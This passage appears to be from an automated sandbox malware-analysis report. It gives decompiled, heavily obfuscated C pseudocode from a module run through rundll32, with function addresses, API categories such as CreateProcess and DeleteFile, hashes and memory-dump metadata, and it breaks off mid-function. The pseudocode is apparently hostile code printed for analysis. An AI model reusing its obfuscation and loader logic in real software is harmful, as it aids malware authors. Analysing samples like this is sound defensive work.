				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x1f641a26;
				 *(_t279 + 0x6c) = 0xb834;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) * 5;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xff22;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xffff2c65;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) ^ 0x00038cf7;
				 *(_t279 + 0x60) = 0x6d71;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) + 0xffff2e20;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) << 0xa;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) >> 7;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) ^ 0x01fcf6fe;
				 *(_t279 + 0x40) = 0xcc9d;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) << 1;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) | 0xa720d145;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) ^ 0xa721d74b;
				 *(_t279 + 0x50) = 0xea3;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) + 0x27fa;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) >> 7;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) ^ 0x00000071;
				 *(_t279 + 0x64) = 0xe156;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) + 0x8b10;
				_t258 = 0x77;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) / _t258;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) << 7;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) ^ 0x0001fc91;
				 *(_t279 + 0x54) = 0xb949;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0xe8c9a038;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x53;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x46;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0x24032f8e;
				 *(_t279 + 0x4c) = 0x8c7e;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) * 0x17;
				_t171 = _t279 - 0x14; // 0x68cf93e9
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) << 5;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) ^ 0x0193ba3f;
				 *(_t279 + 0x30) = 0x8a4e;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) << 0xc;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) | 0xb22e72a5;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) ^ 0xbaaee90f;
				 *(_t279 + 0x18) = 0x537b;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) >> 0x10;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) ^ 0x00002127;
				E002593A8( *(_t279 + 0x44),  *(_t279 + 0x28),  *(_t279 + 0x24), _t171, 0x1e,  *(_t279 + 0x48));
				_t193 = _t279 - 0x21c; // 0x68cf91e1
				E002593A8( *(_t279 + 0x3c),  *(_t279 + 0x34),  *(_t279 + 0x68), _t193, 0x208,  *(_t279 + 0x1c));
				_t198 = _t279 - 0x424; // 0x68cf8fd9
				E002593A8( *(_t279 + 0xc),  *(_t279 + 0x14),  *(_t279 + 0x10), _t198, 0x208,  *(_t279 + 0x58));
				_t202 = _t279 - 0x21c; // 0x68cf91e1
				E00246636(_t202,  *(_t279 + 0x2c),  *(_t279 + 0x6c),  *(_t279 + 0x60),  *((intOrPtr*)(_t279 + 0x78)));
				_t208 = _t279 - 0x424; // 0x68cf8fd9
				E00246636(_t208,  *(_t279 + 0x40),  *(_t279 + 0x50),  *(_t279 + 0x64),  *((intOrPtr*)(_t279 + 0x7c)));
				 *(_t279 - 0x10) =  *(_t279 + 0x5c);
				_t214 = _t279 - 0x14; // 0x68cf93e9
				_t215 = _t279 - 0x21c; // 0x68cf91e1
				 *((intOrPtr*)(_t279 - 0xc)) = _t215;
				_t217 = _t279 - 0x424; // 0x68cf8fd9
				 *((intOrPtr*)(_t279 - 8)) = _t217;
				 *((short*)(_t279 - 4)) =  *(_t279 + 0x38) |  *(_t279 + 0x20);
				_t253 = E00257BF4(_t214,  *(_t279 + 0x54),  *(_t279 + 0x4c),  *(_t279 + 0x30),  *(_t279 + 0x18)); // executed
				asm("sbb eax, eax");
				return  ~_t253 + 1;
			}

0x00247b64
0x00247b6f
0x00247b72
0x00247b75
0x00247b76
0x00247b77
0x00247b7c
0x00247b85
0x00247b8c
0x00247b90
0x00247b97
0x00247b9e
0x00247ba5
0x00247ba9
0x00247bb0
0x00247bbd
0x00247bbe
0x00247bc1
0x00247bc8
0x00247bcf
0x00247bd6
0x00247bda
0x00247be1
0x00247be8
0x00247bf4
0x00247bf7
0x00247bfe
0x00247c05
0x00247c10
0x00247c13
0x00247c1a
0x00247c21
0x00247c25
0x00247c29
0x00247c30
0x00247c37
0x00247c3e
0x00247c45
0x00247c4c
0x00247c53
0x00247c5a
0x00247c5e
0x00247c65
0x00247c6c
0x00247c70
0x00247c77
0x00247c7a
0x00247c81
0x00247c8c
0x00247c8f
0x00247c96
0x00247c9d
0x00247ca1
0x00247ca8
0x00247caf
0x00247cb6
0x00247cbd
0x00247cc4
0x00247cc8
0x00247ccf
0x00247cd6
0x00247cd9
0x00247ce0
0x00247ce7
0x00247cee
0x00247cf5
0x00247cf9
0x00247d00
0x00247d07
0x00247d12
0x00247d15
0x00247d1c
0x00247d23
0x00247d2a
0x00247d33
0x00247d3a
0x00247d3e
0x00247d42
0x00247d49
0x00247d50
0x00247d53
0x00247d5a
0x00247d61
0x00247d68
0x00247d6f
0x00247d73
0x00247d77
0x00247d7e
0x00247d8a
0x00247d8d
0x00247d90
0x00247d94
0x00247d9b
0x00247da2
0x00247dad
0x00247db4
0x00247db7
0x00247dbe
0x00247dc9
0x00247dcc
0x00247dcf
0x00247dd3
0x00247dda
0x00247de1
0x00247de5
0x00247dec
0x00247df3
0x00247dfa
0x00247dfe
0x00247e14
0x00247e21
0x00247e32
0x00247e3a
0x00247e4b
0x00247e53
0x00247e65
0x00247e6d
0x00247e7c
0x00247e84
0x00247e87
0x00247e8a
0x00247e90
0x00247e93
0x00247e99
0x00247ea5
0x00247eb2
0x00247ebc
0x00247ec4

Strings

f''e, xrefs: 00247BF7
6S5q, xrefs: 00247C45

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: 6S5q$f''e
API String ID: 3080627654-2864536462
Opcode ID: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
Instruction ID: 571c8e0eb50c53c2bd8589448332022bb0f3dcdbab6b042a49c7bb96d5940e44
Opcode Fuzzy Hash: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
Instruction Fuzzy Hash: 8DA1CEB140138D9BEF59CF61C9898CE3BB1BF04358F508119FD2A962A0D3BAD959CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0024B41F, Relevance: 2.6, Strings: 2, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0024B41F(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t91;
				signed int* _t93;
				intOrPtr _t95;
				signed int _t103;
				signed int _t104;

				_v44 = _v44 & 0x00000000;
				_v48 = 0x783c80;
				_v8 = 0x978d;
				_v8 = _v8 >> 8;
				_v8 = _v8 >> 5;
				_v8 = _v8 | 0x918d7e28;
				_v8 = _v8 ^ 0x918d7bef;
				_v28 = 0x8ae6;
				_v28 = _v28 + 0xffff2048;
				_v28 = _v28 ^ 0xfffff0f4;
				_v40 = 0x90b0;
				_v40 = _v40 + 0x186c;
				_v40 = _v40 ^ 0x0000e60c;
				_v12 = 0x4bc7;
				_t103 = __edx;
				_v12 = _v12 * 0x77;
				_v12 = _v12 >> 8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x000165a0;
				_v36 = 0x87ea;
				_v36 = _v36 | 0x75974cd4;
				_v36 = _v36 ^ 0x75979443;
				_v32 = 0x7f4c;
				_v32 = _v32 ^ 0x8971dc13;
				_v32 = _v32 ^ 0x89718547;
				_v24 = 0xd36b;
				_t104 = 0x3c;
				_v24 = _v24 * 9;
				_v24 = _v24 << 1;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x000045e9;
				_v20 = 0xf34d;
				_v20 = _v20 + 0x5309;
				_v20 = _v20 << 0xa;
				_v20 = _v20 | 0x23e3e3ea;
				_v20 = _v20 ^ 0x27fbee67;
				_v16 = 0xef72;
				_v16 = _v16 * 0x55;
				_v16 = _v16 << 0x10;
				_v16 = _v16 / _t104;
				_v16 = _v16 ^ 0x0225d37d;
				_push(_v28);
				_t91 = E00241000(_v40, _v12, _v36, _v32, E0025889D(_t93, _v8, _v16));
				_t95 =  *0x25ca28; // 0x2b3138
				 *((intOrPtr*)(_t95 + 0x1c + _t103 * 4)) = _t91;
				return E00252025(_v24, _t90, _v20, _v16);
			}

0x0024b425
0x0024b429
0x0024b430
0x0024b437
0x0024b43b
0x0024b43f
0x0024b446
0x0024b44d
0x0024b454
0x0024b45b
0x0024b462
0x0024b469
0x0024b470
0x0024b477
0x0024b484
0x0024b48a
0x0024b48d
0x0024b491
0x0024b495
0x0024b49c
0x0024b4a3
0x0024b4aa
0x0024b4b1
0x0024b4b8
0x0024b4bf
0x0024b4c6
0x0024b4d1
0x0024b4d2
0x0024b4d5
0x0024b4d8
0x0024b4dc
0x0024b4e3
0x0024b4ea
0x0024b4f1
0x0024b4f5
0x0024b4fc
0x0024b503
0x0024b50e
0x0024b511
0x0024b51a
0x0024b51d
0x0024b524
0x0024b53e
0x0024b543
0x0024b551
0x0024b565

Strings

81+, xrefs: 0024B543
#, xrefs: 0024B4F5

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 81+$#
API String ID: 1029625771-2513173685
Opcode ID: 27f31e60ba08bd43658c3cf475f9688deb41ec468e88d111212cbed426014f6b
Instruction ID: 932c50aebbb2b3dd25cafbdaec5db1dd313ceae6027c888d54d20d813ccf3926
Opcode Fuzzy Hash: 27f31e60ba08bd43658c3cf475f9688deb41ec468e88d111212cbed426014f6b
Instruction Fuzzy Hash: F541ED72C0131AEBDB08CFA5C94A4EEBBB1FB54318F208599C411B62A4D7B90B58CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0024568E, Relevance: 1.4, Strings: 1, Instructions: 184
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E0024568E(void* __ecx, void* __edx) {
				void* _t188;
				void* _t209;
				void* _t210;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				intOrPtr _t242;
				void* _t245;
				void* _t248;
				void* _t249;

				_t248 = _t249 - 0x5c;
				_t242 =  *((intOrPtr*)(_t248 + 0x6c));
				_t245 = __edx;
				_push(0);
				_push( *((intOrPtr*)(_t248 + 0x78)));
				_push( *((intOrPtr*)(_t248 + 0x74)));
				_push( *((intOrPtr*)(_t248 + 0x70)));
				_push(_t242);
				_push( *((intOrPtr*)(_t248 + 0x68)));
				_push( *((intOrPtr*)(_t248 + 0x64)));
				_push(__edx);
				_push(__ecx);
				E0024602B(_t188);
				 *(_t248 + 0x38) = 0xda0c;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) << 7;
				_t215 = 0x75;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) * 0x59;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) ^ 0x25e734ff;
				 *(_t248 + 0x54) = 0xb39d;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) << 6;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) | 0xca3cae0f;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) * 0xe;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) ^ 0x0f551016;
				 *(_t248 + 0x1c) = 0x5da7;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x52b401ed;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) / _t215;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x00b496a1;
				 *(_t248 + 0x30) = 0xba31;
				_t216 = 0x2c;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) / _t216;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) | 0x346b3718;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) ^ 0x346b13e9;
				 *(_t248 + 0x2c) = 0x6402;
				_t217 = 0x3f;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) * 0x14;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) >> 2;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) ^ 0x0001cbcb;
				 *(_t248 + 0x34) = 0x3e45;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) << 0xb;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) >> 2;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) ^ 0x007ce60c;
				 *(_t248 + 0x3c) = 0xfd38;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) + 0xffffe888;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) * 0x69;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) ^ 0x005e4f03;
				 *(_t248 + 0x40) = 0xcc4c;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x07f5c2dc;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) / _t217;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x00207040;
				 *(_t248 + 0x28) = 0x6724;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) + 0xffffafc3;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) << 1;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) ^ 0x000008e0;
				 *(_t248 + 0x24) = 0x9d87;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) >> 6;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) * 0x24;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) ^ 0x00004341;
				 *(_t248 + 0x58) = 0xb89d;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) >> 0xb;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) + 0x8f1;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) << 8;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) ^ 0x00091f00;
				 *(_t248 + 0x44) = 0x534f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) + 0x522f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c12b7e9;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c125009;
				 *(_t248 + 0x20) = 0x7c36;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x32feb437;
				_t218 = 0x73;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) / _t218;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x0071b2de;
				 *(_t248 + 0x4c) = 0x6d80;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xd21e;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xffff4640;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x36936ae7;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x3693cc91;
				 *(_t248 + 0x50) = 0x11c0;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x65d8412a;
				_t219 = 0x49;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) / _t219;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x06211354;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) ^ 0x076544c6;
				 *(_t248 + 0x18) = 0x8ddc;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) | 0x3e354716;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) ^ 0x3e35d915;
				 *(_t248 + 0x14) = 0xfbdb;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) * 0x44;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) ^ 0x0042d7a4;
				 *(_t248 + 0x48) = 0xd404;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) >> 1;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0x728c;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0xfe7d;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) ^ 0x0001b0de;
				_t220 =  *(_t248 + 0x38);
				E002593A8( *(_t248 + 0x38),  *(_t248 + 0x54),  *(_t248 + 0x1c), _t248 - 0x40, 0x44,  *(_t248 + 0x30));
				 *((intOrPtr*)(_t248 - 0x40)) = 0x44;
				_t209 = E0025976F( *(_t248 + 0x2c), _t248 + 4,  *(_t248 + 0x34),  *(_t248 + 0x3c),  *(_t248 + 0x40),  *(_t248 + 0x28), _t248 - 0x40, _t245,  *(_t248 + 0x24),  *(_t248 + 0x38), _t220,  *(_t248 + 0x58),  *(_t248 + 0x44), _t220,  *(_t248 + 0x20),  *(_t248 + 0x4c),  *((intOrPtr*)(_t248 + 0x64)), _t220,  *((intOrPtr*)(_t248 + 0x74))); // executed
				if(_t209 == 0) {
					_t210 = 0;
				} else {
					if(_t242 == 0) {
						E00254F7D( *(_t248 + 0x50),  *(_t248 + 0x18),  *((intOrPtr*)(_t248 + 4)));
						E00254F7D( *(_t248 + 0x14),  *(_t248 + 0x48),  *((intOrPtr*)(_t248 + 8)));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t210 = 1;
				}
				return _t210;
			}

0x0024568f
0x0024569b
0x0024569e
0x002456a0
0x002456a2
0x002456a5
0x002456a8
0x002456ab
0x002456ac
0x002456af
0x002456b2
0x002456b3
0x002456b4
0x002456b9
0x002456c2
0x002456cc
0x002456cf
0x002456d2
0x002456d9
0x002456e0
0x002456e4
0x002456ef
0x002456f2
0x002456f9
0x00245700
0x0024570e
0x00245711
0x00245718
0x00245722
0x00245727
0x0024572c
0x00245733
0x0024573a
0x00245745
0x00245746
0x00245749
0x0024574d
0x00245754
0x0024575b
0x0024575f
0x00245763
0x0024576a
0x00245771
0x0024577c
0x0024577f
0x00245786
0x0024578d
0x00245799
0x0024579c
0x002457a3
0x002457aa
0x002457b1
0x002457b4
0x002457bb
0x002457c2
0x002457ca
0x002457cd
0x002457d4
0x002457db
0x002457df
0x002457e6
0x002457ea
0x002457f1
0x002457f8
0x00245801
0x00245808
0x0024580f
0x00245816
0x00245822
0x00245827
0x0024582c
0x00245833
0x0024583a
0x00245841
0x00245848
0x0024584f
0x00245856
0x0024585d
0x00245867
0x0024586a
0x0024586d
0x00245874
0x0024587b
0x00245882
0x00245889
0x00245890
0x0024589b
0x002458a1
0x002458a8
0x002458af
0x002458b2
0x002458b9
0x002458c0
0x002458d3
0x002458d6
0x002458de
0x00245915
0x0024591f
0x00245951
0x00245921
0x00245923
0x0024593a
0x00245948
0x00245925
0x00245928
0x00245929
0x0024592a
0x0024592b
0x0024592b
0x0024592e
0x0024592e
0x00245959

Strings

@p , xrefs: 0024579C

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: @p
API String ID: 963392458-2609516012
Opcode ID: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
Instruction ID: a7c9b370ed299ff1c294f8dab1b589114cc62936bb6d5d4daf4b3b2771d30285
Opcode Fuzzy Hash: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
Instruction Fuzzy Hash: A2911472500248EFDF59CF61C98A8CE3BA1FF44348F509119FE16961A0D3BAD999CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0024C0C6, Relevance: 1.4, Strings: 1, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0024C0C6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v592;
				void* _t141;
				void* _t159;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t141);
				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v72 = 0x2e7eef;
				_v68 = 0x12a0e3;
				_v36 = 0x822d;
				_v36 = _v36 ^ 0x7542ca13;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00755fa2;
				_v48 = 0xc0ea;
				_t161 = 0x4d;
				_v48 = _v48 * 0x52;
				_v48 = _v48 + 0x53ba;
				_v48 = _v48 ^ 0x003e0539;
				_v8 = 0xf2be;
				_v8 = _v8 ^ 0xca92c6dd;
				_v8 = _v8 | 0xdeb53509;
				_v8 = _v8 + 0x330e;
				_v8 = _v8 ^ 0xdeb75724;
				_v28 = 0xbc60;
				_v28 = _v28 * 3;
				_v28 = _v28 ^ 0x088be546;
				_v28 = _v28 ^ 0x0889fb38;
				_v20 = 0x79be;
				_v20 = _v20 / _t161;
				_t162 = 0x2f;
				_v20 = _v20 * 0x21;
				_v20 = _v20 / _t162;
				_v20 = _v20 ^ 0x000058f8;
				_v12 = 0x6f12;
				_v12 = _v12 + 0x2ef8;
				_v12 = _v12 ^ 0xc4c69b2c;
				_t163 = 0x19;
				_v12 = _v12 / _t163;
				_v12 = _v12 ^ 0x07dec8f1;
				_v16 = 0x233d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0xb86ca57e;
				_v16 = _v16 ^ 0x25a63868;
				_v16 = _v16 ^ 0x9dca839c;
				_v44 = 0x9c92;
				_v44 = _v44 ^ 0x484225af;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0x0ae4f7f7;
				_v56 = 0xf3a1;
				_v56 = _v56 + 0xffff3be5;
				_v56 = _v56 ^ 0x00000dea;
				_v24 = 0xe687;
				_v24 = _v24 ^ 0x2fa59812;
				_v24 = _v24 | 0x8a70baf8;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x7fbf04b5;
				_v40 = 0x7d0b;
				_v40 = _v40 + 0xffffa14c;
				_v40 = _v40 + 0x5747;
				_v40 = _v40 ^ 0x000069af;
				_v32 = 0xbccf;
				_v32 = _v32 << 0xb;
				_v32 = _v32 + 0xa312;
				_v32 = _v32 ^ 0x05e7304f;
				_v52 = 0xd186;
				_v52 = _v52 << 7;
				_t164 = 0xc;
				_v52 = _v52 / _t164;
				_v52 = _v52 ^ 0x0008a17f;
				_push(_v48);
				E00257BAF(_v52,  &_v592, _v28, _a4, _v20, _v12, E0025889D(0x25c050, _v36, _v52));
				E00252025(_v16, _t154, _v44, _v56);
				_t159 = E0025AA3C(_v24, _v40, _v32, _v52,  &_v592); // executed
				return _t159;
			}

0x0024c0d0
0x0024c0d3
0x0024c0d6
0x0024c0d9
0x0024c0da
0x0024c0db
0x0024c0e0
0x0024c0e6
0x0024c0ea
0x0024c0f1
0x0024c0f8
0x0024c0ff
0x0024c106
0x0024c10a
0x0024c111
0x0024c11e
0x0024c121
0x0024c124
0x0024c12b
0x0024c132
0x0024c139
0x0024c140
0x0024c147
0x0024c14e
0x0024c155
0x0024c160
0x0024c163
0x0024c16a
0x0024c171
0x0024c17f
0x0024c186
0x0024c189
0x0024c193
0x0024c196
0x0024c19d
0x0024c1a4
0x0024c1ab
0x0024c1b5
0x0024c1b8
0x0024c1bb
0x0024c1c2
0x0024c1c9
0x0024c1cd
0x0024c1d4
0x0024c1db
0x0024c1e2
0x0024c1e9
0x0024c1f0
0x0024c1f4
0x0024c1fb
0x0024c202
0x0024c209
0x0024c210
0x0024c217
0x0024c21e
0x0024c225
0x0024c229
0x0024c230
0x0024c237
0x0024c23e
0x0024c245
0x0024c24c
0x0024c253
0x0024c257
0x0024c25e
0x0024c265
0x0024c26e
0x0024c277
0x0024c27f
0x0024c282
0x0024c289
0x0024c2ad
0x0024c2bd
0x0024c2d5
0x0024c2e1

Strings

~., xrefs: 0024C0EA

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: ~.
API String ID: 4033686569-2304494891
Opcode ID: 4343a9435147478e74ce7afdd0b613f85e033f675f0708b7522caa75e5a97c89
Instruction ID: cce4518cfa50083d3d43a57838b9f91d0ec7fba05e74837db071d473830f9337
Opcode Fuzzy Hash: 4343a9435147478e74ce7afdd0b613f85e033f675f0708b7522caa75e5a97c89
Instruction Fuzzy Hash: A8511471C1121DEBDF48DFE5D94A8EEBBB2FB04304F208159E511B62A0D7B91A58CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00248736, Relevance: .1, Instructions: 56
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00248736(long __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				long _t77;

				_v16 = 0x5e27;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xcb06;
				_v16 = _v16 + 0xffffffa0;
				_v16 = _v16 ^ 0x0000caae;
				_v20 = 0x53d5;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x29eaafbc;
				_v12 = 0x2701;
				_t77 = __ecx;
				_t66 = 0x3f;
				_v12 = _v12 * 0x75;
				_v12 = _v12 / _t66;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x0000510c;
				_v24 = 0xb555;
				_v24 = _v24 | 0xad821aca;
				_v24 = _v24 ^ 0xad82f196;
				_v8 = 0x411b;
				_t67 = 0x67;
				_v8 = _v8 / _t67;
				_t68 = 0x1c;
				_v8 = _v8 / _t68;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00005eaa;
				_t64 = E0025981E(_t77, E0024C506(_t68), _v16, _v12, _v24, _v8); // executed
				return _t64;
			}

0x0024873c
0x00248745
0x00248749
0x00248750
0x00248754
0x0024875b
0x00248762
0x00248766
0x0024876d
0x0024877b
0x0024877d
0x0024877e
0x00248788
0x0024878d
0x00248791
0x00248798
0x0024879f
0x002487a6
0x002487ad
0x002487b7
0x002487bc
0x002487c4
0x002487c7
0x002487ca
0x002487ce
0x002487ed
0x002487f9

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
Instruction ID: 3cabf6e536b780d2c320fdb8f44ef632b9517bf614f2dbe9d4c3fbe834f8ede8
Opcode Fuzzy Hash: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
Instruction Fuzzy Hash: A0215371D00209EFEF08DFA9D94A4DEBBB2EB44304F208199E415B7294E7B51B64DF81

Uniqueness

Uniqueness Score: -1.00%

Function 00242959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00242959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0024602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
